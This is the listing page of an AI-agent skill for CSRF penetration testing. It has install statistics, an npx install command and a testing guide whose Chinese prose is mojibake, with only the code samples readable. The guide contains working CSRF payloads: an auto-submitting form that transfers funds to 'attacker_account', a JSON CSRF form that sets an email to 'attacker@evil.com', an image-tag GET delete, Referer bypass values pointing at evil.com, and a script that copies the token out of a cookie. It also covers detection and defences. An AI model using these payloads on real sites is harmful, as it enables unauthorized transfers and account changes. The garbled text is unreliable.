csrf-testing
11
总安装量
4
周安装量
#27767
全站排名
安装命令
npx skills add https://github.com/ed1s0nz/cyberstrikeai --skill csrf-testing
Agent 安装分布
codex
3
opencode
2
amp
1
kimi-cli
1
claude-code
1
Skill 文档
CSRFè·¨ç«è¯·æ±ä¼ªé æµè¯
æ¦è¿°
CSRFï¼Cross-Site Request Forgeryï¼æ¯ä¸ç§å©ç¨ç¨æ·å·²ç»å½ç¶æè¿è¡æªæææä½çæ»å»æ¹å¼ãæ¬æè½æä¾CSRFæ¼æ´çæ£æµãå©ç¨åé²æ¤æ¹æ³ã
æ¼æ´åç
- æ»å»è 诱导ç¨æ·è®¿é®æ¶æ页é¢
- æ¶æ页é¢èªå¨åé请æ±å°ç®æ ç½ç«
- æµè§å¨èªå¨æºå¸¦ç¨æ·ç认è¯ä¿¡æ¯ï¼CookieãSessionï¼
- ç®æ ç½ç«è¯¯è®¤ä¸ºæ¯ç¨æ·åæ³æä½
æµè¯æ¹æ³
1. è¯å«æææä½
- å¯ç ä¿®æ¹
- é®ç®±ä¿®æ¹
- 转账æä½
- æéåæ´
- æ°æ®å é¤
- ç¶ææ´æ°
2. æ£æµCSRF Token
æ£æ¥æ¯å¦æTokenä¿æ¤ï¼
<!-- æTokenä¿æ¤ -->
<form method="POST" action="/change-password">
<input type="hidden" name="csrf_token" value="abc123">
<input type="password" name="new_password">
</form>
<!-- æ Tokenä¿æ¤ - åå¨CSRFé£é© -->
<form method="POST" action="/change-email">
<input type="email" name="new_email">
</form>
3. éªè¯Tokenæææ§
æµè¯Tokenæ¯å¦å¯é¢æµï¼
- Tokenæ¯å¦åºäºæ¶é´æ³
- Tokenæ¯å¦åºäºç¨æ·ID
- Tokenæ¯å¦å¯éå¤ä½¿ç¨
- Tokenæ¯å¦å¨å¤ä¸ªè¯·æ±é´å ±äº«
4. æ£æ¥Refereréªè¯
æµè¯Refereræ£æ¥æ¯å¦å¯ç»è¿ï¼
// æ£å¸¸è¯·æ±
Referer: https://target.com/change-password
// æµè¯ç»è¿
Referer: https://target.com.evil.com
Referer: https://evil.com/?target.com
Referer: (空)
å©ç¨ææ¯
åºç¡CSRFæ»å»
HTML表åèªå¨æ交ï¼
<form action="https://target.com/api/transfer" method="POST" id="csrf">
<input type="hidden" name="to" value="attacker_account">
<input type="hidden" name="amount" value="10000">
</form>
<script>document.getElementById('csrf').submit();</script>
JSON CSRF
ç»è¿Content-Typeæ£æ¥ï¼
<!-- 使ç¨form表åæ交JSON -->
<form action="https://target.com/api/update" method="POST" enctype="text/plain">
<input name='{"email":"attacker@evil.com","ignore":"' value='"}'>
</form>
<script>document.forms[0].submit();</script>
GET请æ±CSRF
å©ç¨GET请æ±è¿è¡æ»å»ï¼
<img src="https://target.com/api/delete?id=123">
ç»è¿ææ¯
Tokenç»è¿
å¦æTokenå¨Cookieä¸ï¼
// å¦æTokenåæ¶åå¨äºCookieå表åä¸
// å¯ä»¥å°è¯åªæ交Cookieä¸çToken
fetch('https://target.com/api/action', {
method: 'POST',
credentials: 'include',
body: 'action=delete&id=123'
// ä¸å
å«csrf_tokenåæ°ï¼ä¾èµCookie
});
SameSite Cookieç»è¿
å©ç¨åååï¼
- å¦æSameSite=Laxï¼GET请æ±ä»å¯æºå¸¦Cookie
- å©ç¨åååè¿è¡æ»å»
åéæ交Cookie
ç»è¿Tokenéªè¯ï¼
<!-- å¦æTokenå¨Cookieä¸ï¼ä¸éªè¯é»è¾æç¼ºé· -->
<form action="https://target.com/api/action" method="POST">
<input type="hidden" name="csrf_token" value="">
<script>
// ä»Cookieä¸è¯»åToken
document.cookie.split(';').forEach(c => {
if(c.trim().startsWith('csrf_token=')) {
document.querySelector('input[name="csrf_token"]').value =
c.split('=')[1];
}
});
</script>
</form>
å·¥å ·ä½¿ç¨
Burp Suite
使ç¨CSRF PoCçæå¨ï¼
- æ¦æªç®æ 请æ±
- å³é® â Engagement tools â Generate CSRF PoC
- æµè¯çæçPoC
OWASP ZAP
# 使ç¨ZAPè¿è¡CSRFæ«æ
zap-cli quick-scan --self-contained --start-options '-config api.disablekey=true' http://target.com
éªè¯åæ¥å
éªè¯æ¥éª¤
- 确认ç®æ æä½æ²¡æCSRF Tokenä¿æ¤
- æé æ¶æ请æ±å¹¶éªè¯å¯æ§è¡
- è¯ä¼°å½±åï¼æ°æ®æ³é²ãæéæåãèµéæ失çï¼
- è®°å½å®æ´çPOC
æ¥åè¦ç¹
- æ¼æ´ä½ç½®ååå½±åçæä½
- æ»å»åºæ¯åå½±åèå´
- å®æ´çå©ç¨æ¥éª¤åPoC
- ä¿®å¤å»ºè®®ï¼CSRF TokenãSameSite CookieãRefereréªè¯çï¼
é²æ¤æªæ½
æ¨èæ¹æ¡
-
CSRF Token
- æ¯ä¸ªè¡¨åå å«å¯ä¸Token
- Tokenåå¨å¨Sessionä¸
- éªè¯Tokenæææ§
-
SameSite Cookie
Set-Cookie: session=abc123; SameSite=Strict; Secure -
åéæ交Cookie
- Tokenåæ¶åå¨äºCookieå表å
- éªè¯ä¸¤è æ¯å¦å¹é
-
Refereréªè¯
- éªè¯Refereræ¯å¦ä¸ºåæº
- 注æ空Refererçå¤ç
注æäºé¡¹
- ä» å¨æææµè¯ç¯å¢ä¸è¿è¡
- é¿å 对ç¨æ·è´¦æ·é æå®é å½±å
- è®°å½æææµè¯æ¥éª¤
- èèä¸åæµè§å¨çè¡ä¸ºå·®å¼